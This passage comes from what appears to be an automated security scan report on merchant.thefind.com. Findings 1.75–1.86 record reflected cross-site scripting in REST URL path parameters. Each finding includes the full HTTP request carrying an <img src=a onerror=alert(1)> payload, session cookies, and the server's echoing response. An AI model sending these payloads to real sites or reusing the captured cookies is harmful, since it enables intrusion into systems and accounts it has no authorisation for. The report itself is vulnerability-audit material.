...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.utils.f2549<img src=a onerror=alert(1)>eebdba1c91c]
</div>
...[SNIP]...

1.75. https://merchant.thefind.com/scripts/utils/msie-xpath.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/msie-xpath.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 49be8<img%20src%3da%20onerror%3dalert(1)>a0b8cc726b1 was submitted in the REST URL parameter 1. This input was echoed as 49be8<img src=a onerror=alert(1)>a0b8cc726b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts49be8<img%20src%3da%20onerror%3dalert(1)>a0b8cc726b1/utils/msie-xpath.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:27 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9550

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts49be8<img src=a onerror=alert(1)>a0b8cc726b1.utils]
</div>
...[SNIP]...

1.76. https://merchant.thefind.com/scripts/utils/msie-xpath.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/msie-xpath.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e6c2<img%20src%3da%20onerror%3dalert(1)>6fbaa63ab5d was submitted in the REST URL parameter 2. This input was echoed as 7e6c2<img src=a onerror=alert(1)>6fbaa63ab5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils7e6c2<img%20src%3da%20onerror%3dalert(1)>6fbaa63ab5d/msie-xpath.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9550

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.utils7e6c2<img src=a onerror=alert(1)>6fbaa63ab5d]
</div>
...[SNIP]...

1.77. https://merchant.thefind.com/scripts/utils/msie-xpath.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/msie-xpath.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6ba5d<img%20src%3da%20onerror%3dalert(1)>4f368d4b70c was submitted in the REST URL parameter 3. This input was echoed as 6ba5d<img src=a onerror=alert(1)>4f368d4b70c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils/6ba5d<img%20src%3da%20onerror%3dalert(1)>4f368d4b70c HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:15 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9551

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.utils.6ba5d<img src=a onerror=alert(1)>4f368d4b70c]
</div>
...[SNIP]...

1.78. https://merchant.thefind.com/scripts/utils/panel.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/panel.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e254e<img%20src%3da%20onerror%3dalert(1)>18386850508 was submitted in the REST URL parameter 1. This input was echoed as e254e<img src=a onerror=alert(1)>18386850508 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scriptse254e<img%20src%3da%20onerror%3dalert(1)>18386850508/utils/panel.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:21 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 205
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"panel","fullname":"scriptse254e<img src=a onerror=alert(1)>18386850508.utils.panel","path":".","type":"missing","components":null,"payload":""}}

1.79. https://merchant.thefind.com/scripts/utils/panel.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/panel.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3caaa<img%20src%3da%20onerror%3dalert(1)>3fa18acd6d was submitted in the REST URL parameter 2. This input was echoed as 3caaa<img src=a onerror=alert(1)>3fa18acd6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils3caaa<img%20src%3da%20onerror%3dalert(1)>3fa18acd6d/panel.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 204
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"panel","fullname":"scripts.utils3caaa<img src=a onerror=alert(1)>3fa18acd6d.panel","path":".","type":"missing","components":null,"payload":""}}

1.80. https://merchant.thefind.com/scripts/utils/panel.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/panel.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d1791<img%20src%3da%20onerror%3dalert(1)>2ad30bb2514 was submitted in the REST URL parameter 3. This input was echoed as d1791<img src=a onerror=alert(1)>2ad30bb2514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils/d1791<img%20src%3da%20onerror%3dalert(1)>2ad30bb2514 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:10 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9551

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.utils.d1791<img src=a onerror=alert(1)>2ad30bb2514]
</div>
...[SNIP]...

1.81. https://merchant.thefind.com/scripts/utils/tracking.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/tracking.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3305d<img%20src%3da%20onerror%3dalert(1)>b4402a66225 was submitted in the REST URL parameter 1. This input was echoed as 3305d<img src=a onerror=alert(1)>b4402a66225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts3305d<img%20src%3da%20onerror%3dalert(1)>b4402a66225/utils/tracking.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:25 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 211
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"tracking","fullname":"scripts3305d<img src=a onerror=alert(1)>b4402a66225.utils.tracking","path":".","type":"missing","components":null,"payload":""}}

1.82. https://merchant.thefind.com/scripts/utils/tracking.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/tracking.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec556<img%20src%3da%20onerror%3dalert(1)>59266f81ac4 was submitted in the REST URL parameter 2. This input was echoed as ec556<img src=a onerror=alert(1)>59266f81ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utilsec556<img%20src%3da%20onerror%3dalert(1)>59266f81ac4/tracking.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:41 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 211
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"tracking","fullname":"scripts.utilsec556<img src=a onerror=alert(1)>59266f81ac4.tracking","path":".","type":"missing","components":null,"payload":""}}

1.83. https://merchant.thefind.com/scripts/utils/tracking.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/tracking.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8a47f<img%20src%3da%20onerror%3dalert(1)>4a54edb0999 was submitted in the REST URL parameter 3. This input was echoed as 8a47f<img src=a onerror=alert(1)>4a54edb0999 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils/8a47f<img%20src%3da%20onerror%3dalert(1)>4a54edb0999 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:11 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9551

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: scripts.utils.8a47f<img src=a onerror=alert(1)>4a54edb0999]
</div>
...[SNIP]...

1.84. https://merchant.thefind.com/scripts/utils/ui.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/ui.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47080<img%20src%3da%20onerror%3dalert(1)>963290de19 was submitted in the REST URL parameter 1. This input was echoed as 47080<img src=a onerror=alert(1)>963290de19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts47080<img%20src%3da%20onerror%3dalert(1)>963290de19/utils/ui.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:26 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 198
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"ui","fullname":"scripts47080<img src=a onerror=alert(1)>963290de19.utils.ui","path":".","type":"missing","components":null,"payload":""}}

1.85. https://merchant.thefind.com/scripts/utils/ui.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/ui.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 20237<img%20src%3da%20onerror%3dalert(1)>4a6a3948e7 was submitted in the REST URL parameter 2. This input was echoed as 20237<img src=a onerror=alert(1)>4a6a3948e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils20237<img%20src%3da%20onerror%3dalert(1)>4a6a3948e7/ui.js HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:42 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: Accept-Encoding
Status: 200 OK
Content-Length: 198
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

{"flsid":"6997ae4312fc772848dc3a226943369b","data":{"name":"ui","fullname":"scripts.utils20237<img src=a onerror=alert(1)>4a6a3948e7.ui","path":".","type":"missing","components":null,"payload":""}}

1.86. https://merchant.thefind.com/scripts/utils/ui.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/scripts/utils/ui.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 928cc<img%20src%3da%20onerror%3dalert(1)>bfcee6e097a was submitted in the REST URL parameter 3. This input was echoed as 928cc<img src=a onerror=alert(1)>bfcee6e097a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /scripts/utils/928cc<img%20src%3da%20onerror%3dalert(1)>bfcee6e097a HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:12 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
